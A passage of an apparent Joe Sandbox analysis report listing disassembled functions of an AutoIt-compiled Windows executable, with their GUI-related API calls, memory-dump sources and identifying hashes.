                    • Opcode ID: 3c3750715ad639c7358be64f1c5cfb020074cd15bff87f85b25c122aedfd88ac
                    • Instruction ID: 49fdc1ae385e1375e51bf5fdfbdfdf1fea6739e0d4b989b754e0775bcb26f969
                    • Opcode Fuzzy Hash: 3c3750715ad639c7358be64f1c5cfb020074cd15bff87f85b25c122aedfd88ac
                    • Instruction Fuzzy Hash: C6812DF1600215BBCB64BB64CC83FEE776BAF11700F044129FA41AA2C2EB65DE92C755
                    Function 0070AB60 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetSysColor.USER32(00000012), ref: 0070AB99
                    • SetTextColor.GDI32(?,?), ref: 0070AB9D
                    • GetSysColorBrush.USER32(0000000F), ref: 0070ABB3
                    • GetSysColor.USER32(0000000F), ref: 0070ABBE
                    • CreateSolidBrush.GDI32(?), ref: 0070ABC3
                    • GetSysColor.USER32(00000011), ref: 0070ABDB
                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0070ABE9
                    • SelectObject.GDI32(?,00000000), ref: 0070ABFA
                    • SetBkColor.GDI32(?,00000000), ref: 0070AC03
                    • SelectObject.GDI32(?,?), ref: 0070AC10
                    • InflateRect.USER32(?,000000FF,000000FF), ref: 0070AC2F
                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0070AC46
                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0070AC5B
                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0070ACA7
                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0070ACCE
                    • InflateRect.USER32(?,000000FD,000000FD), ref: 0070ACEC
                    • DrawFocusRect.USER32(?,?), ref: 0070ACF7
                    • GetSysColor.USER32(00000011), ref: 0070AD05
                    • SetTextColor.GDI32(?,00000000), ref: 0070AD0D
                    • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0070AD21
                    • SelectObject.GDI32(?,0070A869), ref: 0070AD38
                    • DeleteObject.GDI32(?), ref: 0070AD43
                    • SelectObject.GDI32(?,?), ref: 0070AD49
                    • DeleteObject.GDI32(?), ref: 0070AD4E
                    • SetTextColor.GDI32(?,?), ref: 0070AD54
                    • SetBkColor.GDI32(?,?), ref: 0070AD5E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                    • String ID:
                    • API String ID: 1996641542-0
                    • Opcode ID: 2e757ea97866c0baa938d2ed11d28eee53283d6be80af183d0f72459b2ae950e
                    • Instruction ID: 3440dcee8eab46a3cbad28c1e7666d6eec20909aa776824a216c5c877da43e32
                    • Opcode Fuzzy Hash: 2e757ea97866c0baa938d2ed11d28eee53283d6be80af183d0f72459b2ae950e
                    • Instruction Fuzzy Hash: EC612271900218FFDB119FA4DC48EAE7BB9EB08320F118225F915AB2E1DA799D50DB94
                    Function 00708C44 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00708D34
                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00708D45
                    • CharNextW.USER32(0000014E), ref: 00708D74
                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00708DB5
                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00708DCB
                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00708DDC
                    • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00708DF9
                    • SetWindowTextW.USER32(?,0000014E), ref: 00708E45
                    • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00708E5B
                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00708E8C
                    • _memset.LIBCMT ref: 00708EB1
                    • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00708EFA
                    • _memset.LIBCMT ref: 00708F59
                    • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00708F83
                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 00708FDB
                    • SendMessageW.USER32(?,0000133D,?,?), ref: 00709088
                    • InvalidateRect.USER32(?,00000000,00000001), ref: 007090AA
                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 007090F4
                    • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00709121
                    • DrawMenuBar.USER32(?), ref: 00709130
                    • SetWindowTextW.USER32(?,0000014E), ref: 00709158
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                    • String ID: 0
                    • API String ID: 1073566785-4108050209
                    • Opcode ID: 0268bb6e8d90cab644056e5b6cd27bb25170c637344e481afcd0f7f5649e1e74
                    • Instruction ID: 104af2ba79414afabc263fcac949635867ccf85293f3d3f76ee62b745272ea0e
                    • Opcode Fuzzy Hash: 0268bb6e8d90cab644056e5b6cd27bb25170c637344e481afcd0f7f5649e1e74
                    • Instruction Fuzzy Hash: DCE19170900219EADF60DF60CC84EEE7BB9EF05710F108359F9659A2D1DB788A81DF65
                    Function 00704B16 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetCursorPos.USER32(?), ref: 00704C51
                    • GetDesktopWindow.USER32 ref: 00704C66
                    • GetWindowRect.USER32(00000000), ref: 00704C6D
                    • GetWindowLongW.USER32(?,000000F0), ref: 00704CCF
                    • DestroyWindow.USER32(?), ref: 00704CFB
                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00704D24
                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00704D42
                    • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00704D68
                    • SendMessageW.USER32(?,00000421,?,?), ref: 00704D7D
                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00704D90
                    • IsWindowVisible.USER32(?), ref: 00704DB0
                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00704DCB
                    • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00704DDF
                    • GetWindowRect.USER32(?,?), ref: 00704DF7
                    • MonitorFromPoint.USER32(?,?,00000002), ref: 00704E1D
                    • GetMonitorInfoW.USER32(00000000,?), ref: 00704E37
                    • CopyRect.USER32(?,?), ref: 00704E4E
                    • SendMessageW.USER32(?,00000412,00000000), ref: 00704EB9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                    • String ID: ($0$tooltips_class32
                    • API String ID: 698492251-4156429822
                    • Opcode ID: 1c36d9353bcba297e1f2d5601d6a364f4394379d8c5150d500c3068f50008b8c
                    • Instruction ID: 5b6b203eae41e386bbd16b9f0a8398739d9e2a49c38bce6d478b50fd146715d4
                    • Opcode Fuzzy Hash: 1c36d9353bcba297e1f2d5601d6a364f4394379d8c5150d500c3068f50008b8c
                    • Instruction Fuzzy Hash: D7B17BB1604340EFDB54DF64C844B6ABBE5BF84314F008A1CF6999B2A1DB75EC05CBA5
                    Function 006827D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                    Download Yara Rule
                    APIs
                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 006828BC
                    • GetSystemMetrics.USER32(00000007), ref: 006828C4
                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 006828EF
                    • GetSystemMetrics.USER32(00000008), ref: 006828F7
                    • GetSystemMetrics.USER32(00000004), ref: 0068291C
                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00682939
                    • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00682949
                    • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0068297C
                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00682990
                    • GetClientRect.USER32(00000000,000000FF), ref: 006829AE
                    • GetStockObject.GDI32(00000011), ref: 006829CA
                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 006829D5
                      • Part of subcall function 00682344: GetCursorPos.USER32(?), ref: 00682357
                      • Part of subcall function 00682344: ScreenToClient.USER32(007467B0,?), ref: 00682374
                      • Part of subcall function 00682344: GetAsyncKeyState.USER32(00000001), ref: 00682399
                      • Part of subcall function 00682344: GetAsyncKeyState.USER32(00000002), ref: 006823A7
                    • SetTimer.USER32(00000000,00000000,00000028,00681256), ref: 006829FC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                    • String ID: AutoIt v3 GUI
                    • API String ID: 1458621304-248962490
                    • Opcode ID: a07a944fe4f2ae7f1e972cde4e1c1e3d077ab0adf5a98d71eb421617d75786cf
                    • Instruction ID: 48c52eba70cc4ac0ecaf206ccf8808eb9c6ac74af3e775c7edc5df76e1976d9a
                    • Opcode Fuzzy Hash: a07a944fe4f2ae7f1e972cde4e1c1e3d077ab0adf5a98d71eb421617d75786cf
                    • Instruction Fuzzy Hash: 84B190B160020ADFDB24EFA8DC55BED7BB5FB08710F108229FA15E7290CB749951CB55
                    Function 00704069 Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON
                    Download Yara Rule
                    APIs
                    • CharUpperBuffW.USER32(?,?), ref: 007040F6
                    • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 007041B6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: BuffCharMessageSendUpper
                    • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                    • API String ID: 3974292440-719923060
                    • Opcode ID: 50a020ee759d83dc58bf24cd66cdc9bf66218aa1213066ec2a24264013751ee6
                    • Instruction ID: 5141d5003c093c7f83e62678bf38e4dced9c64bf3258f894a15ba6d8ae713fda
                    • Opcode Fuzzy Hash: 50a020ee759d83dc58bf24cd66cdc9bf66218aa1213066ec2a24264013751ee6
                    • Instruction Fuzzy Hash: 9BA19EB0214201DFDB54FF20C882A6AB3E6BF84314F144A6CB9969B3D2DB38EC05CB55
                    Function 006F52F0 Relevance: 27.1, APIs: 18, Instructions: 124COMMON
                    Download Yara Rule
                    APIs
                    • LoadCursorW.USER32(00000000,00007F89), ref: 006F5309
                    • LoadCursorW.USER32(00000000,00007F8A), ref: 006F5314
                    • LoadCursorW.USER32(00000000,00007F00), ref: 006F531F
                    • LoadCursorW.USER32(00000000,00007F03), ref: 006F532A
                    • LoadCursorW.USER32(00000000,00007F8B), ref: 006F5335
                    • LoadCursorW.USER32(00000000,00007F01), ref: 006F5340
                    • LoadCursorW.USER32(00000000,00007F81), ref: 006F534B
                    • LoadCursorW.USER32(00000000,00007F88), ref: 006F5356
                    • LoadCursorW.USER32(00000000,00007F80), ref: 006F5361
                    • LoadCursorW.USER32(00000000,00007F86), ref: 006F536C
                    • LoadCursorW.USER32(00000000,00007F83), ref: 006F5377
                    • LoadCursorW.USER32(00000000,00007F85), ref: 006F5382
                    • LoadCursorW.USER32(00000000,00007F82), ref: 006F538D
                    • LoadCursorW.USER32(00000000,00007F84), ref: 006F5398
                    • LoadCursorW.USER32(00000000,00007F04), ref: 006F53A3
                    • LoadCursorW.USER32(00000000,00007F02), ref: 006F53AE
                    • GetCursorInfo.USER32(?), ref: 006F53BE
                    • GetLastError.KERNEL32(00000001,00000000), ref: 006F53E9
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Cursor$Load$ErrorInfoLast
                    • String ID:
                    • API String ID: 3215588206-0
                    • Opcode ID: db290ac4c3ebe168454eed9bbc80e230246b97d66706db33532a4f899810c7a8
                    • Instruction ID: 209ce12a50f9c7ebad4a270f7941744ac265e499c40a57c69acbcffac930800a
                    • Opcode Fuzzy Hash: db290ac4c3ebe168454eed9bbc80e230246b97d66706db33532a4f899810c7a8
                    • Instruction Fuzzy Hash: 17415670E043196ADB109FB68C4996EFFF9EF51750B10452FE609E7290DAB858018E55
                    Function 006DAA64 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                    Download Yara Rule
                    APIs
                    • GetClassNameW.USER32(?,?,00000100), ref: 006DAAA5
                    • __swprintf.LIBCMT ref: 006DAB46
                    • _wcscmp.LIBCMT ref: 006DAB59
                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 006DABAE
                    • _wcscmp.LIBCMT ref: 006DABEA
                    • GetClassNameW.USER32(?,?,00000400), ref: 006DAC21
                    • GetDlgCtrlID.USER32(?), ref: 006DAC73
                    • GetWindowRect.USER32(?,?), ref: 006DACA9
                    • GetParent.USER32(?), ref: 006DACC7
                    • ScreenToClient.USER32(00000000), ref: 006DACCE
                    • GetClassNameW.USER32(?,?,00000100), ref: 006DAD48
                    • _wcscmp.LIBCMT ref: 006DAD5C
                    • GetWindowTextW.USER32(?,?,00000400), ref: 006DAD82
                    • _wcscmp.LIBCMT ref: 006DAD96
                      • Part of subcall function 006A386C: _iswctype.LIBCMT ref: 006A3874
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                    • String ID: %s%u
                    • API String ID: 3744389584-679674701
                    • Opcode ID: 22eb08a67e43bd3d92a245146c560b4fde80d65d22d8914dfbb42462c7fae57f
                    • Instruction ID: f0265a34dafa131f00081878a9274fa1c41de16e4c5903cf72f1ed088d13d652
                    • Opcode Fuzzy Hash: 22eb08a67e43bd3d92a245146c560b4fde80d65d22d8914dfbb42462c7fae57f
                    • Instruction Fuzzy Hash: 9CA1C371608306ABD714DFA0C884BEAB7EAFF44315F00462EF999C2750DB34E945CB92
                    Function 006DB397 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                    Download Yara Rule
                    APIs
                    • GetClassNameW.USER32(00000008,?,00000400), ref: 006DB3DB
                    • _wcscmp.LIBCMT ref: 006DB3EC
                    • GetWindowTextW.USER32(00000001,?,00000400), ref: 006DB414
                    • CharUpperBuffW.USER32(?,00000000), ref: 006DB431
                    • _wcscmp.LIBCMT ref: 006DB44F
                    • _wcsstr.LIBCMT ref: 006DB460
                    • GetClassNameW.USER32(00000018,?,00000400), ref: 006DB498
                    • _wcscmp.LIBCMT ref: 006DB4A8
                    • GetWindowTextW.USER32(00000002,?,00000400), ref: 006DB4CF
                    • GetClassNameW.USER32(00000018,?,00000400), ref: 006DB518
                    • _wcscmp.LIBCMT ref: 006DB528
                    • GetClassNameW.USER32(00000010,?,00000400), ref: 006DB550
                    • GetWindowRect.USER32(00000004,?), ref: 006DB5B9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                    • String ID: @$ThumbnailClass
                    • API String ID: 1788623398-1539354611
                    • Opcode ID: 0edbe87c6b41c5942dc424c1d6f9ba7353cf5db51eb47a2cb3ab974a5812e6a3
                    • Instruction ID: ae0f1396d179b5adac05f9451427ec1fae4edc3f8db22b09f95591c974229d75
                    • Opcode Fuzzy Hash: 0edbe87c6b41c5942dc424c1d6f9ba7353cf5db51eb47a2cb3ab974a5812e6a3
                    • Instruction Fuzzy Hash: DD81DD71408205DBDB10DF10D881FAA7BEAEF44314F08916EFD858A39ADB34DD49CBA5
                    Function 0070C8EE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 181windowfileCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00682612: GetWindowLongW.USER32(?,000000EB), ref: 00682623
                    • DragQueryPoint.SHELL32(?,?), ref: 0070C917
                      • Part of subcall function 0070ADF1: ClientToScreen.USER32(?,?), ref: 0070AE1A
                      • Part of subcall function 0070ADF1: GetWindowRect.USER32(?,?), ref: 0070AE90
                      • Part of subcall function 0070ADF1: PtInRect.USER32(?,?,0070C304), ref: 0070AEA0
                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0070C980
                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0070C98B
                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0070C9AE
                    • _wcscat.LIBCMT ref: 0070C9DE
                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0070C9F5
                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0070CA0E
                    • SendMessageW.USER32(?,000000B1,?,?), ref: 0070CA25
                    • SendMessageW.USER32(?,000000B1,?,?), ref: 0070CA47
                    • DragFinish.SHELL32(?), ref: 0070CA4E
                    • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0070CB41
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$prt
                    • API String ID: 169749273-2223109485
                    • Opcode ID: f9e4df4d17e6e294f89a6a5b37a77393410260af9eff89f9bd487d84a000df7e
                    • Instruction ID: e164349076eac435bdd3e319b74e20995e35632b65655dd54a4f2ac7582745a6
                    • Opcode Fuzzy Hash: f9e4df4d17e6e294f89a6a5b37a77393410260af9eff89f9bd487d84a000df7e
                    • Instruction Fuzzy Hash: 3A616971108301EFC711EF64CC85D9BBBE9EB89710F004A2EF692921A1DB749A49CB56
                    Function 006DB1E0 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: __wcsnicmp
                    • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                    • API String ID: 1038674560-1810252412
                    • Opcode ID: 7af5cc3c8428cfa493912864c91367103fce47f16f8527c71fb574f3853b695f
                    • Instruction ID: ebe2bc6e7b5c5d21c5250ce80f264f8e0ada257c8a4668ccf67a03db1481bfca
                    • Opcode Fuzzy Hash: 7af5cc3c8428cfa493912864c91367103fce47f16f8527c71fb574f3853b695f
                    • Instruction Fuzzy Hash: B831C372904305E6EB54FA60CD83EFE77A69F14750F60011EF541712DAEFA1AF04CA99
                    Function 006DC4C1 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON
                    Download Yara Rule
                    APIs
                    • LoadIconW.USER32(00000063), ref: 006DC4D4
                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 006DC4E6
                    • SetWindowTextW.USER32(?,?), ref: 006DC4FD
                    • GetDlgItem.USER32(?,000003EA), ref: 006DC512
                    • SetWindowTextW.USER32(00000000,?), ref: 006DC518
                    • GetDlgItem.USER32(?,000003E9), ref: 006DC528
                    • SetWindowTextW.USER32(00000000,?), ref: 006DC52E
                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 006DC54F
                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 006DC569
                    • GetWindowRect.USER32(?,?), ref: 006DC572
                    • SetWindowTextW.USER32(?,?), ref: 006DC5DD
                    • GetDesktopWindow.USER32 ref: 006DC5E3
                    • GetWindowRect.USER32(00000000), ref: 006DC5EA
                    • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 006DC636
                    • GetClientRect.USER32(?,?), ref: 006DC643
                    • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 006DC668
                    • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 006DC693
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                    • String ID:
                    • API String ID: 3869813825-0
                    • Opcode ID: ade9f2953554c7c865b5bcc910d1bbc18b20c4bdf14e503ddc0a34d022bd8f49
                    • Instruction ID: 757b1a29885f27efd6f284756f91ef90a538f98ffab880ec66f15fde3c1e1ede
                    • Opcode Fuzzy Hash: ade9f2953554c7c865b5bcc910d1bbc18b20c4bdf14e503ddc0a34d022bd8f49
                    • Instruction Fuzzy Hash: 4451617090070AEFDB20DFA8DD85BAEBBF6FF04715F004629E542A26A0CB75E915CB54
                    Function 0070A428 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 0070A4C8
                    • DestroyWindow.USER32(?,?), ref: 0070A542
                      • Part of subcall function 00687D2C: _memmove.LIBCMT ref: 00687D66
                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0070A5BC
                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0070A5DE
                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0070A5F1
                    • DestroyWindow.USER32(00000000), ref: 0070A613
                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00680000,00000000), ref: 0070A64A
